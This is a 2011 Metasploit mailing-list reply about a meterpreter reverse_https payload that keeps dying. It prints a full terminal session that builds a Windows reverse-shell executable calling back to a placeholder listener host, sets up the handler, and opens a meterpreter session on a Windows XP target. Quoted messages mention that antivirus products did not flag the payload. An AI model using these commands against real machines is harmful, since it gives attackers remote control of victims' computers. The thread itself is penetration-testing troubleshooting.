Re: Meterpreter Reverse_HTTPS dies

[c0lists <lists () carnal0wnage com>]

make sure your LPORT is right, by default reverse_https connects to 8443.

i just tested with current svn and it worked.


chris@carnal0wnage:~/trunk$ ./msfpayload windows/meterpreter/reverse_https LHOST
=y.y.y.y X>demohttps.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_https
 Length: 369
Options: LHOST=y.y.y.y
chris@carnal0wnage:~/trunk$ file demohttps.exe
demohttps.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit
chris@carnal0wnage:~/trunk$ ./msfconsole

      =[ metasploit v3.6.0-beta [core:3.6 api:1.0]
+ -- --=[ 647 exploits - 342 auxiliary
+ -- --=[ 257 payloads - 27 encoders - 8 nops
       =[ svn r11870 updated today (2011.03.03)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST y.y.y.y
LHOST => y.y.y.y
msf exploit(handler) > set LPORT 8443
LPORT => 8443
msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://y.y.y.y:8443/
[*] Starting the payload handler...
[*] x.x.x.x:23735 Request received for /AyCku...
[*] x.x.x.x:23735 Staging connection for target yCku received...
[*] Patching Target ID yCku into DLL
[*] x.x.x.x:23736 Request received for /ByCku...
[*] x.x.x.x:23736 Stage connection for target yCku received...
[*] Meterpreter session 1 opened (y.y.y.y:8443 -> x.x.x.x:23736) at
Thu Mar 03 16:17:48 +0000 2011

meterpreter > sysinfo
Computer   : COMPUTER
OS         : Windows XP (Build 2600, Service Pack 3).
Arch       : x86
Language   : en_US
Meterpreter: x86/win32
meterpreter >


On Thu, Mar 3, 2011 at 4:00 AM, JOhn Mistikopoulos
<mailtest1223133456 () gmail com> wrote:
> I have tried numerous scenarios such as:
> 1. Middle proxy servers (more than 3 different web proxy software)
> 2. A single proxy server
> 3. No proxy server
> 4. Over the internet and locally (get the same error)
> 5. Tested with different service packs (WinXP SP1, SP3, Win7)
> 6. Tested with IE6, unpatched.
> 7. Tested with different user accounts and group policies.
> 8. Tested in Symantec and McAfee Endpoint protection (none marked it as a
> threat)
> 9. Tested without any AV protection or Firewall-IPS.
>
> When I run the payload (for example the "exe" file in an unprotected PC - no
> AV, no IPS) I got the its name on the task manager just for a while and then
> dies.
> HoweverI don't see any instance of iexplorer.exe running.
>
>
> On Wed, Mar 2, 2011 at 5:35 PM, HD Moore <hdm () metasploit com> wrote:
> > On 2/28/2011 6:13 AM, JOhn Mistikopoulos wrote:
> > > And then, the listener stops giving any other info.
> > > I went to the victim PC and realized that the payload exe had already
> > > dies.
> > > I couldn't see it on the task manager.
> > > Concurrently, I had been running wireshark.
> > > The two last packets were:
> > > 1. Victim => Listener (RST, ACK)
> > > 2. Listener => Victim (FIN, ACK)
> > >
> > > Finally I don't get any connections.
> > > Does anyone know how to fix this?
> >
> > Is there any network proxy/filter between the target and yourself? Is
> > the target running an endpoint protection product or HIPS? Is the target
> > process a user-process (IE) or a system process (assuming IE/user-land)?
> >
> > The reverse_https payload is finicky based on the WinInet profile of the
> > user running the code.
> >
> > -HD
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework